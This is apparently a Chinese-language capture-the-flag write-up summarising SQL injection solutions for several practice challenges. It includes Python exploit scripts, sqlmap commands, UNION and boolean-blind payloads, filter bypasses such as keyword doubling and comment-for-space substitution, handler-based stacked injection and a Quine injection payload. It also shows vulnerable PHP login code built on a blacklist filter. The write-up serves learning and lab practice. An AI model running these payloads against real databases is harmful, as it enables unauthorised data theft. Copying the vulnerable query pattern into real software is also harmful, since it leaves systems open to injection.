Web入门-SQL注入小结

做题

[suctf 2019]EasySQL

这题挺抽象的,正确解法是根据一段一段“Array([?]=>?)”的格式猜出有运算符“||”,然后改sql_mode使其成为字符串拼接运算符。

实际上这个后台语句为:

1
select $post['query']||flag from Flag

exp:

1
2
3
4
import requests
payload1={'query':'1;set sql_mode=PIPES_AS_CONCAT;select 1'}
response1=requests.post('http://node4.anna.nssctf.cn:28128/',data=payload1)
print(response1.text[-47:-2])

注意最后一个“1”不能换成字母,否则就和字符串“flag”拼接起来了,在这里是分别查询“1”和“flag”值的意思。

[SWPUCTF 2021 新生赛]erro

1
sqlmap -u http://node4.anna.nssctf.cn:28961/index.php?id=1 -D test_db -T test_tb -C flag --dump

[SWPUCTF 2021 新生赛]sql

爆列数:

1
2
http://node4.anna.nssctf.cn:28915/?wllm=1'order/**/by/**/3%23
http://node4.anna.nssctf.cn:28915/?wllm=1'order/**/by/**/3%23

爆列,当wllm为1时返回结果无法显示,选择-1查询不到,并找出select可用列:

1
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,3%23

爆库:

1
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,database()%23

爆表:

1
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23

爆列:

1
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'%23

爆flag:

1
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23

一次只有20位,采取截断,一次一次输出:

1
2
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/test_db.LTLT_flag%23
http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),40,20)/**/from/**/test_db.LTLT_flag%23

[LitCTF 2023]这是什么?SQL !注一下 !

sqlmap

[强网杯 2019]随便注

堆叠注入,过滤select,改用handler,语法为:

1
2
3
4
5
handler xxx open;
handler xxx read first;
handler xxx read next;
handler xxx read next [where ...];
handler xxx close;

payload:

1
2
3
4
http://node4.anna.nssctf.cn:28703/?inject=1';show+databases;#
http://node4.anna.nssctf.cn:28703/?inject=1';show+tables+from+supersqli;#
http://node4.anna.nssctf.cn:28703/?inject=1';show+columns+from+`1919810931114514`;#
http://node4.anna.nssctf.cn:28703/?inject=1';handler+`1919810931114514`+open+as+`a`;handler+`a`+read+next;#

[CISCN 2019华北Day2]Web1

布尔盲注,直接爆。

1
2
3
4
5
6
7
8
9
10
11
12
13
import string,requests
res=""
url="http://node4.anna.nssctf.cn:28385/index.php"
for i in range(1,60):
    for j in string.printable:
        sql='if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)'.format(i,ord(j))
        post={"id":sql}
        result=requests.post(url=url,data=post)
        if 'Hello' in result.text:
            res+=j
            print(res)
        else:
            continue

[SWPUCTF 2022 新生赛]ez_sql

POST:

1
2
3
4
5
6
7
8
9
10
11
12
13
nss=1 #正确回显
nss=2 #错误无回显
nss=1'and 1=1# #发现过滤and
nss=1'aandnd 1=1# #发现过滤空格
nss=1'aandnd/**/1=1# #正确回显
nss=1'group/**/by/**/3# #有3个字段
nss=1'group/**/by/**/4# #有4个字段
nss=1'uniunionon/**/select/**/1,database(),2# #union绕过 发现信息被正确的踢了
nss=2'uniunionon/**/select/**/1,database(),2# #看到当前数据库名
nss=2'uniunionon/**/select/**/1,2,group_concat(schema_name)from/**/infoorrmation_schema.schemata# #爆所有库名 or被过滤
nss=2'uniunionon/**/select/**/1,2,group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'# #爆表名
nss=2'uniunionon/**/select/**/1,2,group_concat(column_name)from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'# #爆列名
nss=2'uniunionon/**/select/**/1,Secr3t,flll444g/**/from/**/NSS_tb# #爆flag

[湖湘杯 2021 final]Penetratable

先随便注册一个账户,然后登陆,有个修改密码。

修改个密码然后抓包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?c=user&m=updateUserInfo HTTP/1.1
Host: node4.anna.nssctf.cn:28164
Content-Length: 107
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://node4.anna.nssctf.cn:28164
Referer: http://node4.anna.nssctf.cn:28164/?c=user
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1725266993,1725435661,1725519629,1725587320; HMACCOUNT=8A997F8B48BDDC21; PHPSESSID=292c7eacfa77acdca11945bf5aec2fd2; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1725587739
Connection: keep-alive

name=TTE%3D&newPass=81b073de9370ea873f548e31b8adc081&oldPass=81dc9bdb52d04dc20036dbd8313ed055&saying=TTE%3D

用户名和标语看起来像Base64,新、旧密码看起来像MD5。

[第五空间 2021]yet_another_mysql_injection

Quine注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>
<!-- /?source -->
<html>
    <body>
        <form action="/index.php" method="post">
            <input type="text" name="username" placeholder="账号"><br/>
            <input type="password" name="password" placeholder="密码"><br/>
            <input type="submit" / value="登录">
        </form>
    </body>
</html>

说白了就是要控制SQL输出结果。Quine注入的原理如下:

例如在不考虑单双引号的情况下,执行以下语句可获得相同的执行结果:

1
SELECT REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');

再经过一些修改,得到以下语句执行结果与语句完全相等:

1
SELECT REPLACE(REPLACE('REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")',CHAR(34),CHAR(39)),CHAR(46),'REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")');

本题Payload为:

1
username=admin&password=1'/**/union/**/select(REPLACE(REPLACE('"/**/union/**/select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!"))#',CHAR(34),CHAR(39)),CHAR(33),'"/**/union/**/select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!"))#'))#